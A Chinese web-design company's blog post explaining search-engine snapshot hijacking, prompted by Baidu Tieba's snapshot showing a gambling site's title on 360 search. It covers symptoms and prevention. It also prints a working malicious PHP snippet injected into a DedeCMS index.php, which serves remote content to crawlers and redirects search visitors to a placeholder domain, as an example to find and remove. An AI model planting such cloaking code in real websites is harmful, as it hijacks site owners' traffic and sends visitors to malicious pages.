设计出品
扫描关注网站建设微信号

扫一扫微信二维码

百度贴吧在360好搜搜索引擎快照被劫持事件

新乡云优化2019-04-25行业动态
百度贴吧在360好搜搜索引擎快照被劫持事件
今天百度贴吧的快照在360好搜搜索关键词发现被劫持了,第一感觉就是被人攻击了,但也看不出有什么异样,只是在快照上有显示主域名的标题却是另外的菠菜站,不过该网站已经无法打开,应该是百度贴吧技术人员吧改网站通过技术手段打死了。
百度贴吧在360好搜搜索引擎快照被劫持事件
由此初步怀疑是百度快照劫持,首先了解下什么是快照劫持。
百度贴吧在360好搜搜索引擎快照被劫持事件

什么是快照劫持?

快照劫持是利用黑客技术拿到了你的ftp,趁你不注意、蜘蛛正抓取你网站的时候把数据换掉(通常是晚上操作),等蜘蛛抓取完你的快照后再把数据换回来,这样你的网站快照就被劫持了,而且你检查代码也发现不了问题,由于修改主站标题、关键词、描述导致快照停留时间长。
百度贴吧在360好搜搜索引擎快照被劫持事件
快照劫持的目的是什么?
说到黑客劫持快照,它是在你不工作的时候进入你的网站的,一般是凌晨1点到5、6点这段时间。现在的高科技比较发达,他们有一定的方法来进入你的网站后台,把网站的mate标签和title找成他们网站相关的内容,再等到蜘蛛抓取之后到凌晨把原来的信息再换回来,这样神不知鬼不觉,你也不会很轻易的发现什么。因此,第二天的快照就会变成劫持者的网站,这就导致了你的快照被劫持。

百度贴吧在360好搜搜索引擎快照被劫持事件

快照被劫持的原因

1、黑客通过技术访问了你的网站FTP
百度贴吧在360好搜搜索引擎快照被劫持事件
2、他在凌晨1-5点之间 调换了你的title 和mate 标签等
3、他到5点后又把你的内容换回去·
百度贴吧在360好搜搜索引擎快照被劫持事件

快照被劫持的特征

1、利用各搜索引擎去搜索自己网站的域名,所得到的结果是 时时彩 等相关信息。
百度贴吧在360好搜搜索引擎快照被劫持事件
2、网站域名是自己的,搜索引擎搜录的快照日期是最新的,但网站标题、关键字和描述都不是自己的,而是 时时彩 等相关信息。
3、查看源代码是正常的,没有挂马代码,用杀毒软件扫描也检测不到病毒。
4、将目录清空后重新上传备份过的网站文件,可是问题依旧如故。
百度贴吧在360好搜搜索引擎快照被劫持事件
5、网站的根目录无法删除,将文件夹选项设置成“显示隐藏文件”后,并没有发现有隐藏的文件存在。

如何避免快照被劫持

1.FTP安全定期修改网站FTP账号与密码。
2. 服务器安全提升服务器安全性。
百度贴吧在360好搜搜索引擎快照被劫持事件
3. 网站程序安全保证网站程序的安全性。

如何解决快照劫持?【以织梦为例】

织梦百度快照劫持注入代码防范及修正,很多站长做站的过程中,都碰过百度快照被劫持等问题,明明已经修复模板文件了,还是没有更新回正常的快照,以织梦系统为例,
往往根目录/index.php也被植入恶意代码
百度贴吧在360好搜搜索引擎快照被劫持事件
比如:
  <?php if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>
单这段代码就直接把搜索引擎蜘蛛搞晕,带到别的恶意网址去。
百度贴吧在360好搜搜索引擎快照被劫持事件
把其删掉,如果在index.php里没找到,但还是存在类似的问题,可以用dw全站搜索下。
关于防范,空间,ftp账号,权限,后台账号之类都需要设置下,不能太过简单。
其他解决办法
在网上下载一个内核级的系统管理工具(如:PowerTool),利用该工具打开网站根目录,然后删除里面的文件Global.asa,问题就可以解决了。
百度贴吧在360好搜搜索引擎快照被劫持事件
注意: 删除掉文件Global.asa以后,问题并不会马上变好,因为我们需要等待搜索引擎的收录信息更新后,搜索结果才能完全恢复正常。
快照劫持的防范
总结一下:快照劫持不仅仅是针对百度,而且谷歌、360、搜狗等等,都有可能出现快照劫持。各位站长朋友们,只要平时多观察自己的网站、安全做好,FTP以及后台的密码等等做好防范,同时尽可能能的做到发现漏洞即处理,一般来说就很难让黑客有机可乘了。说难也不难,及时出现了快照劫持,不是可还以通过备份方法马上恢复过来吗?
百度贴吧在360好搜搜索引擎快照被劫持事件
 
文章关键词